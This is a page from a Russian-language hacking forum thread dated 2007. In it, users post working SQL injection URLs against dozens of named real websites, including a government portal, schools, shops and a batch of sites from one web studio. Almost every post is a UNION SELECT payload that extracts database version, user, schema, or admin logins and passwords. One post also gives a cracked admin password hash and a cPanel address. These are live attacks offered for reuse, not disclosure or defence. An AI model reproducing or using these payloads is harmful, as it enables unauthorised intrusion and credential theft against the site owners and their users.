ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3681  
Старый 13.11.2007, 19:08
ЛифчиС5СВ
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
Провел на форуме:
1552920

Репутация: 369
По умолчанию

Нашел скуль-инж, вывел хэш админа, но админку не нашел! Нашел только cpanel =) ыыы

SQL-inj:
Код:
http://www.pariaman.go.id/berita/index.php?id=-1+union+select+1,version(),3,4,5,now(),7,8,9
...

CPanel:
Код:
http://www.pariaman.go.id/cpanel
Хеш:пароль админа:
0192023a7bbd73250516f069df18b500:admin123

Админку не нашел =(
 
Ответить с цитированием

  #3682  
Старый 13.11.2007, 20:08
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию

Код HTML:
http://www.jajca.net/sms.php?id=-1%20union%20select%201,2,3,4,concat(admin,0x2b,pass,0x2b,nick,0x2b,icq),6,7,8,9,10+from+users/*
Код HTML:
http://www.jajca.net/sms.php?id=-1%20union%20select%201,2,3,4,concat(nick,0x2b,pass),6,7,8,9,10+from+admins/*

Код HTML:
http://www.trinitrader.com/product_desc.php?id=121+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+trader_db_admin/*

Последний раз редактировалось KEHT33; 13.11.2007 в 23:30..
 
Ответить с цитированием

  #3683  
Старый 14.11.2007, 00:26
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

www.kochfeuer.de
Softbiz Link Directory Script
Цитата:
http://www.kochfeuer.de/searchresult.php?&sbtype=1&inname=-1,-1&exname=-1,-1&sbcat_id=350000000000000000000/**/union/**/select/**/1,concat_ws(0x3A,table_schema,TABLE_NAME),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20 from%20INFORMATION_SCHEMA.TABLES/*&pg=2
Цитата:
http://www.kochfeuer.de/searchresult.php?&sbtype=1&inname=-1,-1&exname=-1,-1&sbcat_id=350000000000000000000/**/union/**/select/**/1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23%20from%20information_schema.co lumns/*&pg=2

Последний раз редактировалось kair; 14.11.2007 в 00:29..
 
Ответить с цитированием

  #3684  
Старый 14.11.2007, 01:52
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию

Код HTML:
http://www.algi.hdwao.pl/comment.php?what=article&id=12+UNION+SELECT+1,2,pass,4,admin,6,nick,icq,9+from+algi_users/*
Код HTML:
http://www.algi.hdwao.pl/comment.php?what=article&id=12+UNION+SELECT+1,2,pass,4,5,6,nick,icq,9+from+poezje_users/*
БД 5
 
Ответить с цитированием

  #3685  
Старый 14.11.2007, 01:56
FoxMALDER
Познающий
Регистрация: 26.07.2007
Сообщений: 50
Провел на форуме:
177050

Репутация: 62
По умолчанию

dinaitour.com - туризм в Украине
4.1.20dinaitourdinaitour@localhost
Код:
http://www.dinaitour.com/tourism/tour/ukraine/?tour=3&sub=-1+union+select+1,concat_ws(0x05,version(),database(),user()),3,4/*
 
Ответить с цитированием

  #3686  
Старый 14.11.2007, 01:58
FoxMALDER
Познающий
Регистрация: 26.07.2007
Сообщений: 50
Провел на форуме:
177050

Репутация: 62
По умолчанию

nadejda.com.ua - агенство недвижимости
5.0.45-lognadejda_nadejdanadejda_unadejda@localhost
Код:
http://www.nadejda.com.ua/index.php?page=list&prm=sale&x=&city=-1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x05,version(),database(),user()),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
http://www.nadejda.com.ua/index.php?page=list&prm=sale&x=&city=-1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x05,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+information_schema.columns/*
cities
constypes
flattypes
main
maps
objects
typetypes
 
Ответить с цитированием

  #3687  
Старый 14.11.2007, 02:01
FoxMALDER
Познающий
Регистрация: 26.07.2007
Сообщений: 50
Провел на форуме:
177050

Репутация: 62
По умолчанию

pizzamarketplace.com - Pizza Marketplace
4.0.27-standardsitedbatmmarketplace@localhost
Код:
http://www.pizzamarketplace.com/research.php?rc_id=-1+union+select+concat_ws(0x05,version(),database(),user()),2,3,4,5,6,7,8,9/*
Проголодались?
 
Ответить с цитированием

Серия сайтов сделаных студией Granite5
  #3688  
Старый 14.11.2007, 02:09
FoxMALDER
Познающий
Регистрация: 26.07.2007
Сообщений: 50
Провел на форуме:
177050

Репутация: 62
Exclamation Серия сайтов сделаных студией Granite5

Серия сайтов сделаных студией Granite5

4.1.10a-standard-logcenturycareadmin@localhost
Код:
http://www.21centurycare.co.uk/vacancydetails.php?id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),2,3,4/*
4.1.10a-standard-logallNationsCollegeadmin@localhost
Код:
http://www.allnations.ac.uk/newsevent.php?newseventid=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*&section=Home
4.1.10a-standard-logblueoceanadmin@localhost
Код:
http://www.blueoceanpublishing.biz/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
4.1.10a-standard-logbmladmin@localhost
Код:
http://www.bmlbss.com/news_article.php?id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),2,3,4,5,6/*
4.1.10a-standard-logbournadmin@localhost
Код:
http://www.bournschool.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
4.1.10a-standard-logdruidsadmin@localhost
Код:
http://www.boxtreebar.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
4.1.10a-standard-logbremedadmin@localhost
Код:
http://www.bremed.co.uk/shop.php?shopcatid=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),5,6,7,8,9,10,11,12,13,14,15,16/*
4.1.10a-standard-logbullyingmattersadmin@localhost
Код:
http://www.bullyingmatters.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
4.1.10a-standard-logbosadmin@localhost
Код:
http://www.businessofficesupplies.co.uk/news_story.php?id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),2/*
4.1.10a-standard-logcambridgeblueadmin@localhost
Код:
http://www.cambridgeblue.biz/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
4.1.10a-standard-loggeniusTemplateadmin@localhost
Код:
http://www.caro.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
4.1.10a-standard-logfelthamsadmin@localhost
Код:
http://www.cplfelthams.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
4.1.10a-standard-logchairs4childrenadmin@localhost
Код:
http://www.chairs4children.com/article.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),3,4,5,6,7,8/*
4.1.10a-standard-loggeniusTemplateadmin@localhost
Код:
http://www.cliffordburr.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
4.1.10a-standard-loggeniusTemplateadmin@localhost
Код:
http://www.country-toys.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
4.1.10a-standard-logcranfieldeg2admin@localhost
Код:
http://www.cranfieldelectrical.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
4.1.10a-standard-loggeniusTemplateadmin@localhost
Код:
http://www.crownhillgarden.com/index.php?pageid=-1+union+select+1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
4.1.10a-standard-logcrowoodadmin@localhost
Код:
http://www.crowood.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
4.1.10a-standard-loggeniusTemplateadmin@localhost
Код:
http://www.crtsolutions.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
4.1.10a-standard-logwichitaadmin@localhost
Код:
http://www.wichita.co.uk/productdetails.php?id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),2,3,4/*
Cambridge University Rugby Club
4.1.10a-standard-logcurufcadmin@localhost
Код:
http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
P.S.: Кстати, это далеко не полный список сайтов... Почти половина!

Последний раз редактировалось FoxMALDER; 14.11.2007 в 02:13..
 
Ответить с цитированием

  #3689  
Старый 14.11.2007, 02:23
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://www.colorprint.ru/index.php?id=-37+union+select+concat_ws(0x2F,version(),user(),database()),2,3,4,5,6,7/*
4.0.26/colorprintru@217.23.152.183/colorprintru
 
Ответить с цитированием

  #3690  
Старый 14.11.2007, 02:34
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию

Код HTML:
http://www.greenshift.com/news.php?id=-97+UNION+SELECT+1,user,password,4,5,6,7,8,9,10,11,12+from+mysql.user/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
 


Быстрый переход




ANTICHAT.XYZ